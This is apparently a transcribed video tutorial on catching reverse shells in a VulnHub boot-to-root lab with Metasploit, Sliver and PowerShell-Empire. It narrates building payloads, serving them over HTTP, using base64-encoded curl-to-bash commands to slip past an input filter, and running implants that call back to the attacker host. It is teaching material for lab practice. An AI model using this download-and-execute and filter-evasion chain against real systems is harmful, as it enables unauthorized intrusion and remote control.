Hey, greetings everyone. Daniel Lowry back with hopefully yet another cool video for you. And today's video is going to be all about reverse shells. And you're like, hey, reverse shells, Daniel. I know reverse shells. That's kid stuff. Yeah, it is, but it's still kind of fun. I always just enjoy it, right? There's nothing like seeing that connection back in your Netcat listener of reverse shells. But that actually leads us to the second part of what the video is about, which is not using Netcat to catch reverse shells, using other tools, right? Because when we do CTFs, when we do something like a boot to root or in hack the box or some other challenge like that, and we get that initial foothold, we typically run straight to Netcat. At least most of the people I know do. You might use other stuff, but Netcat seems to be the fairly ubiquitous tool for the job, and for good reason. It does a really good job of it, except for the whole like getting, having to control Z and turn the echo off and setting it to raw so you can use all the fun stuff like control C's and stuff like that within your reverse shells. You got to spin up probably another Python shell within that shell. There's a little rigmarole that goes to it. And that's totally fine, right? I don't want to dish on that. That's good learning. If you have never done that, those are things that you need to do. You need a fully functioning TTY, a fully interactive TTY session is always a good skill to learn. But we're on the topic of learning, right? And this whole idea was sparked from reading my LinkedIn feed, and somebody said, I'm going to stop using Netcat. I want to use other tools. I'm going to use a C2 framework for all all my shell catching, right? And I was like, that's a really cool idea. So I went out to the interwebs. I looked up a boot to root challenge and ended up on VulnHub, got a boot to root challenge from there, and was like, yeah, I think this is going to be great for the demonstration of using other tools for catching shells. And to me, where my mind went was, hey, we this is all about learning, right? This is the thing that we're trying to do is learn about stuff. Let's use other tools. Let's learn other tools for doing this. And maybe you've just started off with Netcat and you're grabbing Netcat shells all day long and you're ready to graduate to something different, right? Or maybe you've been doing something different, which we'll talk about in just a second, and you're ready to graduate to something different from there, right? So I'm going to choose 3 different tools for us to use to catch shells today. We're going to use Metasploit. We're going to use Sliver, which is a C2, a command and control framework, and we're going to use PowerShell-Empire with Starkiller, their GUI front end. Very cool stuff. Another command and control framework. And that'll kind of take us through different ways to do this. I think it's a lot of fun. Here I have the actual CTF, the boot to root challenge. Like I said, I grabbed this off of VulnHub. And yeah, this was really fun. This is called The Planet's Earth. So if you go to vulnhub.com, you do a search for The Planet's Earth, you should be able to land on this. So if you want to follow the bouncing ball specifically with me, you can. And what I liked about this is it gave us a command injection vulnerability, right? We've got this, somebody built a foolish tool of a web-based, hey, run any CLI command you like. That's bad. But it does give us a good facility for doing what we want to do, which is demo all these tools on generating agents, payloads, uploading them to our target, firing them off on our target, catching those shells with the actual command and control servers, the listeners, as it were. Right? So there we go. That's what we're doing now. This one is a little interesting. You'll notice I tried to run curl here and I got this error. Remote connections are forbidden. So there's a little filtering going on here. And not only that, but you can only put 100 characters within this input box. And trust me, I tried. I ran it through burp, and yeah, I could use more than 100 characters using repeater, but then I got an error saying you have more than 100 characters in your payload. Please trim that back. And I said, dang you. So that was a little fun to get around this. So we're going to have to base 64 encode our commands and fire them off, right? So it's going to be a lot of fun. And what I'll do is I'll just use we'll keep a terminal here. for that purpose. And let me see here. Blah, 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 blah. That way you can see it. We'll make it human readable. Bang. That looks good. Okay, so are we ready to start the challenge? Like I said, what we're going to do is we're going to create a payload using each one of those tools. We'll upload the payload, we'll catch the payload, and that'll be cool. And that'll give us some experience. Again, this is all about learning, and we want to learn. I had to do some learning myself with some of these tools. I wasn't familiar with how to do, especially for Linux with Starkiller. That was interesting. It didn't, it's really obviously in the, it's PowerShell-Empire. It's meant more specifically to be used with Windows targets, but I said, can I make it do Linux? Does it support a Linux payload? It does, and it does. It's a little weird and a little convoluted, but we'll get to it. So let's have some fun, shall we? So first thing we need to do is let's start off with Metasploit, right? So I've created this folder, Metasploit, and the first thing we need to do is create our payload. So we use MSF Venom for that. And then we will do, if you ever need to know, like, hey, what payloads are available for me, you can do --list payloads. I highly recommend you grep what you're looking for. Otherwise, you will be looking for a while. I'm going to be looking for Linux /x64. I want x64 payloads. So fire that off, let it do its thing, takes a moment to whir and grind, and then it comes back with all the x64 stuff. Now, I want a Meterpreter shell because I like Meterpreter payloads, and there's one right there. It is stageless. That looks good to me. I'll just go with a standard reverse TCP. There are other options, HTTP, HTTPS, SCTP, whatever you like. These, I'm starting to get into staged up here, but that's cool. Here's what I want, though. I'm going to take this payload. Just copy that. And here, I can then run MSF Venom again, Venom, do a -p to tell it what payload I want to use, paste in my payload name, and then I got to give it some options. So like lhost for the listening host is going to be 10.10.10.136. The lport is going to be, we'll use 3333 because why not? And then I guess I need to give it a format. Format is going to be ELF because it is a Linux binary that I want to create. And then -o for the output file name. And then you give it a file name. We will call this shell-01 because sounds good. All right, let that do its thing. Magic has happened. We should now have shell-01, which we do. Now, like I said before, in our CTF input box, I only have 100 characters. So space is at a premium. So I am going to name that, I'm gonna copy this shell-01, copy shell-01, and I'm just gonna call it 1, like that. Bing. One single character. Again, space at a premium. That's totally fine. We know what it is, and that's all that matters. That's good. I now need to serve this up with Python. So Python 3, yeah, -m http.server. And I'm going to put it on port 81. Again, I don't want to use port 8000 because I have to, that has to be a part of my command, and port 80 is already taken. I mean, I guess I could go with port 8, or yeah, I could use port 8 if I want, but 81 should be fine. That gives me 2 extra characters. My command string is like just at the limit. I think I was at like 108 characters with my original command string. I need to shrink that down to something a little bit smaller. So just grabbing a couple characters here and there should do the trick. All right, so port 81, bam. It is now serving up hot with web files. All right, so from there, we now need to create that payload. Let me see here. I need, where are we at? That's one. That's the one. Give it to me. All right. So let's go into that Metasploit, and there's our payloads. I guess I don't need to be here necessarily. I just need to base64 encode my command. So I am going to echo, and I want to curl http:// So I'm going to use curl to get the file and then output it to somewhere. So this is going to be 10.10.10.136. So it's going to grab from my IP on port 81. So colon 81, and then /1. So there's my curl command. Well, almost. I've almost forgot. I got to output that to a different directory because I believe we're in the root directory, which I don't have rights to write to. I don't have write permissions. So I'll put it in temp 1. Cool. Echo that. Looks good. Pipe that to base 64-D. I hate when it cuts off like that, don't you? Don't you hate that? There we go. Base 64-D. And not dash D, just base 64. There we go. I'm so used to dash, but there you go. There is our base 64 string. Okay. So now I have the curl command. I'm going to copy that. Now it's all encoded. See, I tried before, right? I think we said, you see that remote connections are forbidden, right? We can't use remote connections. I can't curl straight from here. It won't allow it. So I'm having to get around that lovely little feature, that filter. So from here, I will echo, and I'll put in my command string, and I'll pipe that to base 64. Here I will decode -D, and then I'll pipe that. Actually, I can save another character, bash. And if that runs, we should be able to see it grabbed right here. So let's run the command. Go here, bam. Cool beans. It got just like we like. Excelente. So now I should be able to do an ls of /temp, run the command, and we can see there's 1 right there. There's my old shell, right, from testing for this. So cool. We have it. We can now chmod +x /temp1, and that should have run. And if I want to, I can check that with ls-l of temp. And we can see there is RWX, bang, bang, on 1. Excellent. So things are coming along quite nicely now. We have an executable file. We now need to go set up our listener. I think I got this one over here. We'll use that there. So we'll do msf console to start Metasploits. That usually takes just a moment. Come on, Metasploit. Don't make us wait. Thank you, Metasploit. It heard me, right? And we're going to use exploits multi-handler. And this is how you catch interpreter shells and things of that nature. You catch other things as well, but we'll see that we have, this says, using configured payload of generic shell reverse TCP. Wrong-o, that's not what we want. We wanted our Linux shell that we used here. This is the payload we want to use. So I'm going to copy that again. And we'll come back and we will do that. So we will set payload of, and then paste that in. And now when we do options, we should see that the payload is set to Linux, just like we like. Now we do need to change this because we use port 333 and we need to set the L host. So let's do that. Set L host of 10.10.10.136 and set L. And by the way, it is case insensitive, so you can use 3333. And options just to verify that all that went well. It does look like it did. And we'll run it. Run! Go! Metasploit, do Metasploity things. Excellent. It has begun. Now we just need to run our command, right? So /temp/1. If we run that command, I noticed that we're getting a little ping pong game going on over here. So let's jump back to, oh, look, we have a shell that is open. Yay! I love it when a plan comes together, says Hannibal. So now we can do shell if we like. And that should give us ID. Yeah, look, we're logged in. I can do the stuff, and it is a Meterpreter shell, which is awesome. If something happens, if I accidentally break things, a lot of times Metasploit does a really good job of handling shells, especially when they're Meterpreters. As long as that process is running on the other end, we're good, right? We're good to go. And that's super great. And of course, you can set up persistence. There's a lot of of cool functionality, but this is step one into doing that, is catching the shell with Metasploit. And now you have all the Metasploit options available to you. And if you want to, you can, I think it's exits, and you can do help, right? And you can see what you can do. And this is just a little more pro. Now, some of you may have used Metasploit before, and you'll be like, yeah, Daniel, I've seen Metasploit. Metasploit's cool. I use it. But some of you may not have, and you need to know, how do I actually catch these shells? How do I even create a payload to catch? Well, there you go. Now you've got it. All right. So that was fun. We're done with Metasploit. I'm going to exit out. Goodbye and goodbye. Let's go kill our session over here. We don't need Python right now. We're going to clear that. Let's get out of Metasploits. And let's see. Let's make another mkdir. We'll call it Sliver. And we'll move into Sliver. Bam. Because we're going to use Sliver. Now, I will just, you have to do, I don't need sudo for this because I'm not using anything that needs sudo, I think. So let's do Sliver, if I'm not mistaken, -server. Bam. Yeah, there we go. I love it. And I'll see if it has any of the jobs I've tried. Cool. So this is clean, just like I hoped it would be. So what we need to do now is generate a payload, just like what we did before. So to do that, of course, you can always fire off the help command. There's multiple help. This is kind of another good step up. A lot of people like to use this as their C2 framework. It's very easy to get set up. It's very easy to kind of get working with. And you can see for multiplayer, so if you have multiple operators, you can create new operators, go into multiplayer mode, and then collaborate with people remotely. And that's a really cool function that you have here. But what we want to do is we're going to use things like, so we have a few generic things that we could do, but we are going to use the generate command to generate what they call an implant, right? Implants, agents, stagers, payloads. There's all sorts of fun names for these things, right? And then we are going to use, they recommend in their documentation to use MTLS. So cool, that's what we will use. Other commands are here as well, but they're neither here nor there. Really, that's what we're going to use to get everything rocking and rolling. Now, we are going to be using the session version of this and not the beaconing version, but beaconing is, using a beacon would probably be more realistic. So if you want to, you can play with that after you watch the video, right? So to do this, we are going to generate, I think it's --MTLS. And then we're going to give it a server and a port. So 10.10.10.136 colon, and then whatever port we want it to run on. So we'll use 5555 here because, again, why not? Who says I can't? And then we're going to give it --OS to tell what OS, because it is specific. You have to tell it. It uses Windows, Mac OS, and Linux. So we will say Linux. And then sometimes you will have to put architecture, but I don't think I need to here. I think it defaults to x64, so that should be good. So all we need to do is --save and give it a name. So again, we'll call it shell. We'll call this one O2, just to be cool. And this takes a minute, so please be patient because it is obfuscating. It's doing a little bit more stuff to try to keep it from being picked up by AV. It still gets propped most likely in a lot of ways, in a lot of systems, but that's cool. Doesn't matter. Again, in CTFs, we're not going to run into that normally. So there we go. It tells us where it was saved. Home Kali Sliver Shell 02. So we will, let's go here and let's go into CD Sliver and we will copy /home Kali Sliver. Oh, I have a sliver here. Yeah, there it is. It copied it right where it's supposed to be. Excellent. I love it when a plan comes together. Hannibal back. Stop, Hannibal. Stop. Right? All right. Now, next thing we need to do is start the listener, right? So we're already here. Let's just make it happen. So MTLS is the command that we need to use. And then we do --L host. And we give it the 10.10.136. I'm just thinking in my head, is this the right thing, right? Yeah, am I doing it right? Yes. And then --L port. They're smaller, but I like those because it's easy to remember. And we did 5555, if I'm not mistaken. Cool. Fire that off. We have a job. We can use jobs, I think. Yeah. And we can see that that is listening. Yay. Now we just need to serve it up hot, just like we did before. So we'll go to Python. Of course, we'll change this. We will copy shell02 to the number 2, and we'll Python that sucker up, python-m http.server on port 81, just like we did before. So now all we have to do is go change our little payload thing, right? Let me get that again. Where's that? Was it Metasploit? Yeah, that's the one we want. No, not you. That's from when I was working earlier. There we go. Let's change this. And we just need to put that as 2. And we need to put that as 2. And fire it off. Notice it is very similar, but it's not exactly the same. So we're going to copy this and get that out of the way and do the same thing like we did before. So we got to upload our payload, our agent, I think they call it, right? No, what did they call it? Implant. That's right. Implants is another common term for these things. So for here, we're going to echo, put that in there, Shift Control V, and pipe that to base 64-D, pipe that to bash. And if everything goes well, right, we should see that show up there. So run command. Hopefully, yes, it downloaded it. Excelente. Now we can do the old chmod plus x temp 2. Run that, and then fire it off, which is /temp/2. Run command. I see a little ping pong. I feel like we have action here. Oh, look at that. Session. Booyah. And now we can look at sessions. There it is. I think that you just need the session ID. So I'm going to help sessions if you're not remembering things like I am. And let's see here. Oh, interact. Bam. So -I interact. So sessions -I. And then you need the session string, which is that. Copy and paste. And now we are in the session. We can work with the tool, right? We've got it. We can do help. We can see what we have available to us. We can take screenshots. We can do a lot of different like normal style commands. This is really interesting. We are in a session mode and not a beacon mode. If we were in beacon, there would be a time delay. So that, because there's things called jitter and things of that nature. And I do highly recommend you go and do it in the beacon style as well, so that you can get that experience. But we have all sorts of capabilities from here. We can make directories. We can, if you had a beacon, you could go interactive on it, right? So very cool. And of course, we're talking about catching shells today, so we can do shell. So if I do shell, it says this action is bad OPSEC. Are you an adult? Yes, I am. And you'll notice it defaults to no, right? It's saying you don't want to do this, right? I'm like, no, yeah, I want to do this. And the reason it's saying that is because this is going to, if this was a real engagement, this would raise tons of red flags, okay? So there's that. I guess I forgot to mute my computer here. Give me 1 second. There we go. Mutation. But now I'm dropped into a shell. I can do an ls, right? ID. I'm good to go. And this is a really solid shell. It's going to be maintained by Sliver. It's going to do a really good job of keeping it running. So there's that. All right. So we have done Metasploits. We have done Sliver. Last but not least, let's play around with PowerShell-Empire. I keep just want to call it Empire because that's what I'm used to. But PowerShell-Empire and Starkiller. Very cool stuff. I've actually already got it all running. You just have to run PowerShell-Empire server. I would sudo that. I think it actually asks you for sudo, but there you go. I've already got it running to kind of save us some time. But let me exit out of this and wait for it. Is that going? Come on. Apparently oh, you know what it is? It's Control C. That's right. You have to wait 10 seconds after you press end. And then, yeah. After exit. So And then after 10 seconds, you press enter, bam, there it goes. That's what you do. Sorry. You type in exit, you wait 10 seconds, you press enter. That's how you get out. And now I want to exit here and I'm good. All right, so excellent. We are going to kill this because we are now no longer needing that. What we do need is to go to Starkiller. And bada bing. Now, normally, to get to this, right, you just go to, well, I feel bad now that I didn't show you. I will show you. You can see that this has been on for a minute. That was when I was playing with Havoc. More Sliver stuff. Sliver. Boy. This is when I was getting ready for this show. You're getting to see all the fun stuff. Where is... Oh, there we go. Okay, well, we'll scroll and get to where I started this process. And there you go. Boom. PowerShell-Empire. So if you type in PowerShell-Empire, it'll give you the help file, which is exactly what you want. You tell it server. So PowerShell-Empire server. That's what starts the server. After it starts, and this is what I was looking for you good folks, it shows you that, like, waiting for application to start up complete, and it is running on 0.0.0.1337. So you just go to your web browser and you type in, 127.0.0.1/1337. It takes you to the login, which you will register a user. Once you get your first user registered, you're logged in and you can now start having fun. And the first stop you're going to go to is listeners. So you click on listeners, which is where we are right now. And you'll want to create a listener. So create. And here you're going to want to go for the type. For me, I just go for an HTTP listener here. Now we're going for Linux, and this is where I got a little confused with it because I typically use this with Windows. I was like, oh yeah, can I do it with Linux? And it's like, yeah, you can. Okay, help me out there. So what we're going to do is we're going to give it a type of HTTP. We're going to call this HTTP. We'll call it CTF3-03 because I've got a few already. We're going to change the host to 10.10.10.136 because that's where we're going. We're on port 80, which I think is already being used. So this, I won't actually create this. We'll use the one that's already created. And because you can only use, I would have to delete those because it is utilizing port 80 right now. Don't worry about this launcher stuff because it ignores it if you're using a Linux payload. So that was the thing I had to learn. Like, is there something I need to do here? Do I need to change this launcher string? Do I need to change anything in here? But nope, this is all good. It should be fine. This is just basically a generic listener, which is exactly what we want. And then you would hit submit. But of course, I'm going to get failed because if I go to my listeners, I already have one on 2 different ports, right? So, and of course you can check that and edits so we can we can view it so we can see what's all inside of there. And you'll notice it's fairly straightforward, right? Port 80, 10.10.10.136, port 80, it's all good in the hood. Now, we got to run over to stagers. Now we got to create a stager. So I created one already. We can take a look at this. And of course, all you'd have to do is hit create. You'd give it the type, and it would be Linux Bash right out of the gate. Give it a name, and then connect it to a listener. So we could give this a name of, we'll call it shell-03, and we'll connect it to a listener. Your dropdown, we'll go with port 80 because why not? You'll notice the language is going to be with Python. I also turned off safe checks because I don't know if it'll give me a problem because it's in a virtual machine. So I just turn that off because it says it checks for little snitch or a sandbox. And a lot of times just by seeing like a VMware MAC address, it'll go, oh, I'm in a sandbox and not run. So I didn't want to mess with that. And then out file. So we gave it a name of shell-03. Out file is launcher.sh, but we will use something else. We'll use shell-03. Shell-03. Bing. After that, you just hit submit, and it creates the file. Stager created. Now, all we have to do, serve it up hot, right? That's the fun part of this. Now, I forget Empire is in a weird place. So let me do some finding. So find slash, I want to say it's in my home directory, but I don't remember. So slash name shell-o3, and we are looking for dash type of F because it's a file to dev null. Fire it up. There it is. So yeah, I told you it's in a fairly complicated directory. I'm just going to move it into here in the Sliver directory, and then we'll serve up Python again. So copy /homes /kali /.local share empire downloads generated shell-o3 to here. Cool. We should have shell-o3, which we do, and then I'll copy shell-o3 to 3. Bam. We've got it. We got the Venus just popped into my head. All right, Python it is. That is the soup du jour of http.server on port 81. And now we just need to serve up our thing. So we'll pull this up again, change this to 3, change that to 3, fire it off, copy that, copy, please move. And we'll go back to our little command prompt here, and we will echo, pipe that in, pipe that to base 64-D, pipe that to bash. Run command. Hopefully we see that it did grab it. Yep, excellent. We're on our way, kids. This is old hat for you at this point, right? Now we run chmod plus x of temp3, and then one more command of /temp3. Fire it off. I feel like things are happening. Now notice that I've got this thing over here. I can see, oh, look, a new agent, and I can view it. Cool. Or you can go to agents right over here and click that. Let's do that. Click agents. There we go. Agents. There it is. We have a connection. And this is, I mean, you got to admit, this is kind of nice, right? Like I can click on it and that takes us here where we are interacting with it. This is that more traditional command and control structure where there's jitter, there's beaconing. You issue a command, there's time that you need to wait before it actually responds, right? So if I dropped into a terminal, well, hey, I could run shell commands here. So if I did like ID and run, you'll say, hey, cool, shell command is submitted. And now I'm waiting. I'm waiting. And I'm just, oh, but there it is. You see, it'll show up here. It'll say, hey, look, task results, or you can just go to tasks and see that that's where it comes back. And a few seconds ago, we ran ID, and that's fun. We're probably still waiting, honestly, for that, but we can do all sorts of stuff where we can download this input, we can download the output, copy it to the clipboard, and do all sorts of fun stuff, right? Of course, what we're looking for, though, is interact. We want to hit that terminal button because we're all talking about catching shells, right? This is all about shell catching. And from here, of course, you just type in help. It shows you what you can run. So if I wanted to run sysinfo or who am I? So who am I? And then you wait 2, 3, 4. I think it's about 7 seconds. Yeah, there you go. It's 5 seconds by default. So I'm running as Apache. Awesome. But if I want that full interactive shell, I got to type in, I think it's just shell, right? Or is it? Yeah, there it is, shell. And there we go. So let's do that. Let's type in shell. Hello. You can do it. Shell. Fire it off. It says that the shell session has started on this agent. And exit shell menu with Control-C. It looks like we're in, and I can do ls-al if I want. Again, you have to wait. This is a little more inconvenient if you're running a CTF, so you might want to change that functionality, but we do have a shell, and it is fairly stable. And that's what this was all about. And that's hopefully something really cool that you enjoyed, because we want to continue to expand our knowledge on what we know how to do and how we can do it, gain new tools for the toolkit, stuff we can put on resumes. That's always nice. If someone's like, oh, what's your experience with working with C2 frameworks, you can go like, oh, I've used Metasploit quite extensively. Hopefully that's something that's normal, but I've also used Sliver. I've also used Empire, PowerShell-Empire, and the Starkiller as a nice front end. Have a fairly extensive knowledge of that. It's because you know how to create the listeners, you know how to create the stagers, you know how to grab the agents, all that. And you can do it for multiple different systems. And that's what this was all about. And hopefully you got it, you're loving it. You're like, oh, this is for me. If you really want to learn more about C2s, it's really cool. There's tons of them. Check out the C2 matrix. I'll put the link in the description below. But yeah, there we go. This was fun. I enjoyed it. Hopefully you did too. But I'm going to call it a day. I'm tired. Papa's got to get his rest. Thanks for watching, though. If you found some value, you know what to do. Hit like and subscribe. Don't forget the notification bell after you subscribe. That way you know whenever I release a new video. I also have Cybercast IRL on Fridays. It's a live stream for cybersecurity chatting. I get real interactive with the people in the chat room. It's a lot of fun. So check that out. That's at Fridays at 10 a.m. Eastern time. Whew, a lot of info to throw out there to you. I'm sorry. I'm going to let you go. Have a great day. And until next time, keep hacking.